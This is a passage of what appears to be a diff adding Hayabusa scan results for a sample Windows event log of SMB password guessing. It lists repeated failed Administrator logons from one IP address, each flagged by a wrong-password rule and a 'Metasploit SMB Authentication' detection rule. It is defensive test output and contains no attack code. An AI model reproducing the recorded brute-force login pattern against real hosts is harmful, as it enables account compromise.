+2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVv7vete3uXixggi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0PF6E3wRP0Tk39ss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: touwF4IXUahG7jvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lMOi7rygc7SJ5TPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QjM1K5eFSA9U37oE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HgzyZqFU9v2kDVvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hJeVj2h0sBxwBuGv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FNXI8b6Zcj1zU3JY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9DyH9oxFbRTCQ80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5LZo1ljGLOVKhwcC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvY6Q7RGKwjehARC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uKLrHVMevqniTck8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldxglvKFhLJQ3FV3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lRHIAxIj9wFRIg67 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mc7nvfyDfWpnhhBx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB7Y4gPbxose5TsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yKFU6DJ8Wdtp2qdC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YlbxRctdClWIOjss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LToi5ANf3tUteu4h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 52YPmYviVPBqJ39Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JpzKsyxEKNLd8l1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0vd6xEFevamX3jF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WR9gJBoN1ra4NI2M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: rGYNVrDBIpMBu9GT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 57qCysbeaXx12CbY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyJl4mHvgtTv53d9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGBDZCtot2ogcKIO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bBhmbqZIi1gX62mM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o7d4bcBJV1jlRgdt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtfFb6hMHJiFXxai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frlsZMDcdb5WaW99 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CFV8UiUTRCCfab9l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZI8P6ZeVRmQlbGtz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: UmJI7S1nj5hfWZqv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: veh8XInSzXe8E9UD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1BuBHLILZ4afwJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NN2h7CHnGSCQZXan : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BU3fxfM1qGBJ55HS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1OlBmhUABabDQbN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DgQtHG7cT05kRXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUTe3JqVWgDcDcOS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nGKgUOyX3USQlESB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcIJ8keQvgax1SuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: A7jsyA7bWtVf4sLr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mijnM28fwbgWzkvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dNmJo7vkacqxA6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FxvD2OWtadDT1Q2c : IP Address: 192.168.198.149 : AuthPackage: 
